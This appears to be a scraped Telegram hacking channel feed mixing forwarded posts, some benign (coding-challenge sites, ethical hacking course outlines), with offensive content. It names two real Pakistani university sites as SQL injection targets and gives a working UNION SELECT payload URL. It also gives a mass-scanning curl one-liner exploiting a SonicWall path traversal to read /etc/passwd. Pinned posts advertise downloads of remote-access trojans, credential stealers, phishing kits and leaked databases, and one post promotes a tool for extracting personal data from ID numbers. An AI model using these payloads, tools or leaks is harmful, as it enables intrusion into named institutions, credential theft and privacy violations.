Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
KD6-3.7
#Python tool for getting additional information about ID holders from the following countries:
๐ฆ๐ฑAlbania
๐ง๐ชBelgium
๐ง๐ฆBosnia and Herzegovina
๐ง๐ฌBulgaria
๐จ๐ฟCzech Republic
๐ฉ๐ฐDenmark
๐ช๐ชEstonia
๐ซ๐ฎFinland
๐ซ๐ทFrance
๐ธ๐ฐSlovakia
github.com/duk3r4/KD6-3.7
Contributor @duk3r4
#Python tool for getting additional information about ID holders from the following countries:
๐ฆ๐ฑAlbania
๐ง๐ชBelgium
๐ง๐ฆBosnia and Herzegovina
๐ง๐ฌBulgaria
๐จ๐ฟCzech Republic
๐ฉ๐ฐDenmark
๐ช๐ชEstonia
๐ซ๐ฎFinland
๐ซ๐ทFrance
๐ธ๐ฐSlovakia
github.com/duk3r4/KD6-3.7
Contributor @duk3r4
GitHub
GitHub - duk3r4/KD6-3.7: A tool for extracting additional data from a person's personal identifiers
A tool for extracting additional data from a person's personal identifiers - duk3r4/KD6-3.7
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
OSINT TIP #221 ๐ฝ๏ธ
HeygenLabs - instant AI video translation, using a natural voice clone and authentic speaking style!
looks cool, try it yourself!
@HeyGen_Official
๐ labs.heygen.com/video-translate
Remember OPSEC ๐
tft: @StuartJRitchie ๐
#OSINT #AI #CyberSecurity
HeygenLabs - instant AI video translation, using a natural voice clone and authentic speaking style!
looks cool, try it yourself!
@HeyGen_Official
๐ labs.heygen.com/video-translate
Remember OPSEC ๐
tft: @StuartJRitchie ๐
#OSINT #AI #CyberSecurity
HeyGenLabs
HeyGen Labs
Interactive Avatar, Personalized Video, Expressive Photo Avatar... Cooking up the next AI magic with cutting-edge HeyGen Labs innovation.
Government Graduate College Sahiwal ( PK
UNIVERSITY OF SAHIWAL ( PK
Taregt:
1-http://www.gpgcs.edu.pk/alumni_profile_details.php?alumni_id=7[SQLi]
2-https://www.uosahiwal.edu.pk/press.php?id=2[SQLi]
Demo:
http://www.gpgcs.edu.pk/alumni_profile_details.php?alumni_id=-7+Union+Select+1,2,3,4,database(),6,7,8,9,10,11,version(),13,14,15--+
#hacker_bano_chutiya_nhe โค๏ธ
#pkmc_ontop ๐ฅ
UNIVERSITY OF SAHIWAL ( PK
Taregt:
1-http://www.gpgcs.edu.pk/alumni_profile_details.php?alumni_id=7[SQLi]
2-https://www.uosahiwal.edu.pk/press.php?id=2[SQLi]
Demo:
http://www.gpgcs.edu.pk/alumni_profile_details.php?alumni_id=-7+Union+Select+1,2,3,4,database(),6,7,8,9,10,11,version(),13,14,15--+
#hacker_bano_chutiya_nhe โค๏ธ
#pkmc_ontop ๐ฅ
๐2
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Here are some YouTube videos on hacking beginners to advanced roadmap tutorials:
* [the hackerโs roadmap (how to get started in IT in 2023)](http://www.youtube.com/watch?v=uTAaFExLgwQ) by NetworkChuck
* [How To Become A Hacker In 2023 | Step By Step Guide For Beginners](http://www.youtube.com/watch?v=W6vcd2gJw3Q) by Tech Xpress
* [Introduction to Hacking | How to Start Hacking](http://www.youtube.com/watch?v=SkfxL_We8ro) by PhD Security
* [Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)](http://www.youtube.com/watch?v=3FNYvj2U0HM) by The Cyber Mentor
* [How To Become Ethical Hacker In 2023 | Ethical Hacking Roadmap | All About Hacking | Simplilearn](http://www.youtube.com/watch?v=7tWpzMtR5pQ) by Simplilearn
I hope these videos help you on your journey to becoming a hacker!
http://googleusercontent.com/youtube_content/5
* [the hackerโs roadmap (how to get started in IT in 2023)](http://www.youtube.com/watch?v=uTAaFExLgwQ) by NetworkChuck
* [How To Become A Hacker In 2023 | Step By Step Guide For Beginners](http://www.youtube.com/watch?v=W6vcd2gJw3Q) by Tech Xpress
* [Introduction to Hacking | How to Start Hacking](http://www.youtube.com/watch?v=SkfxL_We8ro) by PhD Security
* [Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)](http://www.youtube.com/watch?v=3FNYvj2U0HM) by The Cyber Mentor
* [How To Become Ethical Hacker In 2023 | Ethical Hacking Roadmap | All About Hacking | Simplilearn](http://www.youtube.com/watch?v=7tWpzMtR5pQ) by Simplilearn
I hope these videos help you on your journey to becoming a hacker!
http://googleusercontent.com/youtube_content/5
YouTube
the hackerโs roadmap (how to get started in IT in 2023)
This video is outdated! Watch the 2025 version: https://youtu.be/5xWnmUEi1Qw?si=ullcXDUh0uPUzoUF
This video was originally sponsored by ITProTV. Weโve since launched NetworkChuck Academy, our own place to learn IT: https://ntck.co/NCAcademy
Are you wantingโฆ
This video was originally sponsored by ITProTV. Weโve since launched NetworkChuck Academy, our own place to learn IT: https://ntck.co/NCAcademy
Are you wantingโฆ
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Telegram Search Engine
Search for Channels, Bots & Groups.
xtea.io/ts_en.html
#cybersecurity #infosec #OSINT
Search for Channels, Bots & Groups.
xtea.io/ts_en.html
#cybersecurity #infosec #OSINT
XTEA
XTEA - Telegram Search Engine | Find Channels, Groups & Bots
Discover thousands of Telegram channels, groups, and bots instantly. The #1 Telegram search engine.
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Top Coding Challenge Websites to improve your skills.
โข LeetCode
๐ leetcode.com
โข Codewars
๐ codewars.com
โข HackerRank
๐ hackerrank.com
โข CodeChef
๐ codechef.com
โข iCodeThis
๐ icodethis.com
โข Frontend Mentor
๐ frontendmentor.io
โข playCSS
๐ playcss.app
โข Coderbyte
๐ coderbyte.com
โข CodinGame
๐ codingame.com
โข LeetCode
๐ leetcode.com
โข Codewars
๐ codewars.com
โข HackerRank
๐ hackerrank.com
โข CodeChef
๐ codechef.com
โข iCodeThis
๐ icodethis.com
โข Frontend Mentor
๐ frontendmentor.io
โข playCSS
๐ playcss.app
โข Coderbyte
๐ coderbyte.com
โข CodinGame
๐ codingame.com
๐ธBlack Wallpaper HD Background App Data Leak : Download
๐ชฌPlayTube CVE-2023-4714 Exploit : Check
๐ธPaperCut NG CVE-2023-4568 Exploit : Check
๐Prestashop CVE-2023-39677 Exploit : Check
๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check
๐ฒCisco CVE-2023-20209 Exploit : Check
๐ฏElasticsearch Exploit-CVE-2023-31419 : Check
๐ช Chinese Maoxin Database Leak : Download
๐พ๐NSA Equation Group Hacking Tools Leaked : Download
๐ชฌPlayTube CVE-2023-4714 Exploit : Check
๐ธPaperCut NG CVE-2023-4568 Exploit : Check
๐Prestashop CVE-2023-39677 Exploit : Check
๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check
๐ฒCisco CVE-2023-20209 Exploit : Check
๐ฏElasticsearch Exploit-CVE-2023-31419 : Check
๐ช Chinese Maoxin Database Leak : Download
๐พ๐NSA Equation Group Hacking Tools Leaked : Download
CrackCodes ๐ฎ๐ณ pinned ยซ๐ธBlack Wallpaper HD Background App Data Leak : Download ๐ชฌPlayTube CVE-2023-4714 Exploit : Check ๐ธPaperCut NG CVE-2023-4568 Exploit : Check ๐Prestashop CVE-2023-39677 Exploit : Check ๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check ๐ฒCisco CVE-2023โฆยป
๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฏ-๐ฌ๐ญ๐ฎ๐ฒ ๐ฃ๐ฟ๐ฒ-๐ฎ๐๐๐ต๐ฒ๐ป๐๐ถ๐ฐ๐ฎ๐๐ถ๐ผ๐ป ๐ฃ๐ฎ๐๐ต ๐๐ฟ๐ฎ๐๐ฒ๐ฟ๐๐ฎ๐น ๐๐๐น๐ป๐ฒ๐ฟ๐ฎ๐ฏ๐ถ๐น๐ถ๐๐ ๐ถ๐ป ๐ฆ๐ ๐๐ญ๐ฌ๐ฌ๐ฌ
๐๐ฅ
Link: https://twitter.com/thecybertix/status/1707268135907475495?t=o2AtY0lW2VPX9s3Qgfgy_g&s=19
๐๐ฅ
Link: https://twitter.com/thecybertix/status/1707268135907475495?t=o2AtY0lW2VPX9s3Qgfgy_g&s=19
X (formerly Twitter)
Cybertix (@thecybertix) on X
CVE-2023-0126 Pre-authentication path traversal vulnerability in SMA1000
One Liner
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";doneโฆ
One Liner
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";doneโฆ
๐1
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
(FREE) Complete Ethical Hacking Training 15+ Hours by whitesec cyber security consultancy and Trainings.
course topics -
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhat vs whitehat
33:28 What Problem does ethical hackers identify
38:24 limitations of ethical hacking
44:55 Installing Vmware and Downloding kali linux
46:30 Setuping Kali Linux
58:36 What is FootPrinting
1:07:58 What is Passive Information Gathering
1:16:41 What is Active Information Gathering
1:25:30 How to Perform FootPrinting
1:38:26 How to Perform google Hacking
2:17:11 How to Perform Footprinting Through Shodan
2:31:02 Footprinting censys and whois
2:41:20 Website FootPrinting using Wappalyzer and Netcraft
2:53:45 Finding subdomains
3:29:25 Extracting Website Links
3:34:41 Gathering Information of SSL Certificate
3:44:44 Email FootPrinting
3:52:04 What is Network Scanning
4:00:05 Scanning Network Using Nmap
4:11:18 How to Perform enumeration on ftp ssh telnet smtp
4:24:28 Vulnerability Scanning using nmap
4:27:43 Vulnerability scanning on websites
4:32:04 cracking windows passwords
4:45:35 How to Perform Steganography
4:56:57 what is malware
5:20:24 Trojan keylogger ransomware virus practically
5:42:19 social Engineering - Using Premade Web Template for Phishing
5:45:33 Social Engineering Site Cloning
5:48:18 Adapter for wifi hacking
5:49:35 wifi hacking
5:57:06 windows hacking and penetration testing
5:58:07 Introduction to Windows Hacking and Penetration testing and setting up lab
6:17:53 Scanning Network
6:23:32 checking live machines in Network
6:29:00 Scanning OS and about TTL
6:33:25 About Nmap and Open Ports
6:42:38 service version detection and exploits
6:45:30 How to detect firewall
6:47:38 How to Bypass Firewall
6:49:38 About Fragmentation How its work
6:53:33 What is syn scan and How to perform it
7:02:18 How to Perform Nmap Scan using Different ips (Explanation)
7:10:54 (Practical)How to Perform ip spoofing or using Different ips to Perform Nmap Scanning
7:15:36 Enumeration using Nmap(Explanation)
7:24:30 How to Perform Enumeration (Practically)
7:36:58 How to Perform Vulnerability Scanning Using Nmap
7:45:11 About Metasploit
7:56:03 About MSFvenom
8:01:04 65.Generating Encoded Payload Using Metasploit
8:09:28 MSF console setting up Connection
8:19:20 About Privilege Escalation
8:31:43 Examples Of Privilege Escalation
8:36:45 How to Perform Privilege Escalation
8:43:42 About Eternalblue Vulnerability
8:51:48 what is external and internal network
8:56:32 About Eternalblue Vulnerability-2
9:02:16 Exploiting Eternalblue vulnerability
9:12:30 Exploiting Windows 7 and some important commands
9:24:40 setting up Persistence
9:45:48 privilege Escalation in windows 7
9:55:48 privilege Escalation in Windows 10
10:07:32 Persistence in windows 10
10:13:22 how to clear logs from victim machine
10:17:33 what is migration
10:24:14 Dumping windows Hashes
part - 2
0:37 Dumping Windows Hashes From Memory
6:36 Dumping Clear Text Password from windows
14:45 cracking Hashes Using John the ripper
27:43 injecting payload in real Application
36:50 Setting Up shelter
44:01 How to Generate Advance Payload Using Veil Framework
57:56 Compile Veil Python file to exe
1:14:40 How to implement this Attacks in real world
1:22:25 Advance Red team training
1:44:51 Android Hacking and important notice
1:47:34 How to Setup ngrok
1:56:47 Live Android Remote Access
2:02:32 How to Control Android
2:07:38 installing Ngrok in kali Linux
2:09:25 How to Setup Fatrat
2:22:56 Generating Payload using Fatrat
2:34:35 Setting up Rapid Payload and generating payload
2:46:26 Advance android hacking course
3:13:57 Kali Linux hacking
Training Link ๐๐
part - 1 https://youtu.be/w_oxcjPOWos?si=eD8BmJ1Poy54eHda
part - 2 https://youtu.be/kAShcvzb7wU?si=3KbAyfdPCTK430mA
course topics -
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhat vs whitehat
33:28 What Problem does ethical hackers identify
38:24 limitations of ethical hacking
44:55 Installing Vmware and Downloding kali linux
46:30 Setuping Kali Linux
58:36 What is FootPrinting
1:07:58 What is Passive Information Gathering
1:16:41 What is Active Information Gathering
1:25:30 How to Perform FootPrinting
1:38:26 How to Perform google Hacking
2:17:11 How to Perform Footprinting Through Shodan
2:31:02 Footprinting censys and whois
2:41:20 Website FootPrinting using Wappalyzer and Netcraft
2:53:45 Finding subdomains
3:29:25 Extracting Website Links
3:34:41 Gathering Information of SSL Certificate
3:44:44 Email FootPrinting
3:52:04 What is Network Scanning
4:00:05 Scanning Network Using Nmap
4:11:18 How to Perform enumeration on ftp ssh telnet smtp
4:24:28 Vulnerability Scanning using nmap
4:27:43 Vulnerability scanning on websites
4:32:04 cracking windows passwords
4:45:35 How to Perform Steganography
4:56:57 what is malware
5:20:24 Trojan keylogger ransomware virus practically
5:42:19 social Engineering - Using Premade Web Template for Phishing
5:45:33 Social Engineering Site Cloning
5:48:18 Adapter for wifi hacking
5:49:35 wifi hacking
5:57:06 windows hacking and penetration testing
5:58:07 Introduction to Windows Hacking and Penetration testing and setting up lab
6:17:53 Scanning Network
6:23:32 checking live machines in Network
6:29:00 Scanning OS and about TTL
6:33:25 About Nmap and Open Ports
6:42:38 service version detection and exploits
6:45:30 How to detect firewall
6:47:38 How to Bypass Firewall
6:49:38 About Fragmentation How its work
6:53:33 What is syn scan and How to perform it
7:02:18 How to Perform Nmap Scan using Different ips (Explanation)
7:10:54 (Practical)How to Perform ip spoofing or using Different ips to Perform Nmap Scanning
7:15:36 Enumeration using Nmap(Explanation)
7:24:30 How to Perform Enumeration (Practically)
7:36:58 How to Perform Vulnerability Scanning Using Nmap
7:45:11 About Metasploit
7:56:03 About MSFvenom
8:01:04 65.Generating Encoded Payload Using Metasploit
8:09:28 MSF console setting up Connection
8:19:20 About Privilege Escalation
8:31:43 Examples Of Privilege Escalation
8:36:45 How to Perform Privilege Escalation
8:43:42 About Eternalblue Vulnerability
8:51:48 what is external and internal network
8:56:32 About Eternalblue Vulnerability-2
9:02:16 Exploiting Eternalblue vulnerability
9:12:30 Exploiting Windows 7 and some important commands
9:24:40 setting up Persistence
9:45:48 privilege Escalation in windows 7
9:55:48 privilege Escalation in Windows 10
10:07:32 Persistence in windows 10
10:13:22 how to clear logs from victim machine
10:17:33 what is migration
10:24:14 Dumping windows Hashes
part - 2
0:37 Dumping Windows Hashes From Memory
6:36 Dumping Clear Text Password from windows
14:45 cracking Hashes Using John the ripper
27:43 injecting payload in real Application
36:50 Setting Up shelter
44:01 How to Generate Advance Payload Using Veil Framework
57:56 Compile Veil Python file to exe
1:14:40 How to implement this Attacks in real world
1:22:25 Advance Red team training
1:44:51 Android Hacking and important notice
1:47:34 How to Setup ngrok
1:56:47 Live Android Remote Access
2:02:32 How to Control Android
2:07:38 installing Ngrok in kali Linux
2:09:25 How to Setup Fatrat
2:22:56 Generating Payload using Fatrat
2:34:35 Setting up Rapid Payload and generating payload
2:46:26 Advance android hacking course
3:13:57 Kali Linux hacking
Training Link ๐๐
part - 1 https://youtu.be/w_oxcjPOWos?si=eD8BmJ1Poy54eHda
part - 2 https://youtu.be/kAShcvzb7wU?si=3KbAyfdPCTK430mA
YouTube
Complete Ethical hacking course 16 hours | ethical hacking full course with practical | Zero to Hero
free ethical hacking course by whitesec cyber security consultancy pvt ltd.
course content :-
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhatโฆ
course content :-
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhatโฆ
๐2
Hey Everyone, you can join our WhatsApp Channel too, just to get some Important and Good Resources
Join us Now: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
Join us Now: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
CVE-2023-0126
SonicWall SMA1000
File Read Bug
POC:
SonicWall SMA1000
File Read Bug
POC:
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";doneโค3
๐ธBlack Wallpaper HD Background App Data Leak : Download
๐ชฌPlayTube CVE-2023-4714 Exploit : Check
๐ธPaperCut NG CVE-2023-4568 Exploit : Check
๐Prestashop CVE-2023-39677 Exploit : Check
๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check
๐ฒCisco CVE-2023-20209 Exploit : Check
๐ฏElasticsearch Exploit-CVE-2023-31419 : Check
๐ช Chinese Maoxin Database Leak : Download
๐พ๐NSA Equation Group Hacking Tools Leaked : Download
๐ชฌPlayTube CVE-2023-4714 Exploit : Check
๐ธPaperCut NG CVE-2023-4568 Exploit : Check
๐Prestashop CVE-2023-39677 Exploit : Check
๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check
๐ฒCisco CVE-2023-20209 Exploit : Check
๐ฏElasticsearch Exploit-CVE-2023-31419 : Check
๐ช Chinese Maoxin Database Leak : Download
๐พ๐NSA Equation Group Hacking Tools Leaked : Download
๐3โค1
CrackCodes ๐ฎ๐ณ pinned ยซ๐พCraxs Rat V6.7 : Download ๐งฎEvilginx3 Phishlets : Download ๐ฒChrome-extention Stealer V2 : Download ๐ธInvicta Stealer: A Powerful, Native Stealer : Download ๐ชฌRemcos Rat 3.8.0 Cracked : Download ๐NSA Equation Group Hacking Tools Leaked : Downloadยป
Follow the Cybertix channel on WhatsApp: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
New Release โผ๏ธ
๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐จ๐ก๐๐ข๐ก ๐๐๐๐ฎ๐ฐ๐ธ
๐ง๐ผ๐ฝ๐ถ๐ฐ ๐๐ผ๐๐ฒ๐ฟ๐ฒ๐ฑ:
๐ญ. What is UNION Operator
๐ฎ. How UNION Attack Works
๐ฏ. Practically Exploiting other Tables in database using UNION Attack๐ฅ
& ๐บ๐ฎ๐ป๐ ๐ ๐ผ๐ฟ๐ฒ
Please Share your Views & Like + Subscribe to our YouTube channel for more ๐๐๐ง๐๐๐๐๐ Explanation of Vulnerabilities ๐๐
๐๐ถ๐ป๐ธ: https://youtu.be/ussCtO2AfUc?si=gMjaT0vCpbMlELMI
๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐จ๐ก๐๐ข๐ก ๐๐๐๐ฎ๐ฐ๐ธ
๐ง๐ผ๐ฝ๐ถ๐ฐ ๐๐ผ๐๐ฒ๐ฟ๐ฒ๐ฑ:
๐ญ. What is UNION Operator
๐ฎ. How UNION Attack Works
๐ฏ. Practically Exploiting other Tables in database using UNION Attack๐ฅ
& ๐บ๐ฎ๐ป๐ ๐ ๐ผ๐ฟ๐ฒ
Please Share your Views & Like + Subscribe to our YouTube channel for more ๐๐๐ง๐๐๐๐๐ Explanation of Vulnerabilities ๐๐
๐๐ถ๐ป๐ธ: https://youtu.be/ussCtO2AfUc?si=gMjaT0vCpbMlELMI
YouTube
27 SQL Injection UNION Attack
๐๐น๐๐๐ค๐๐ง๐๐๐: https://drive.google.com/file/d/1LE9bKQsU2iubWkTX0XmEKDvye-m6CbDX/view?usp=sharing
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.โฆ
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.โฆ
โค2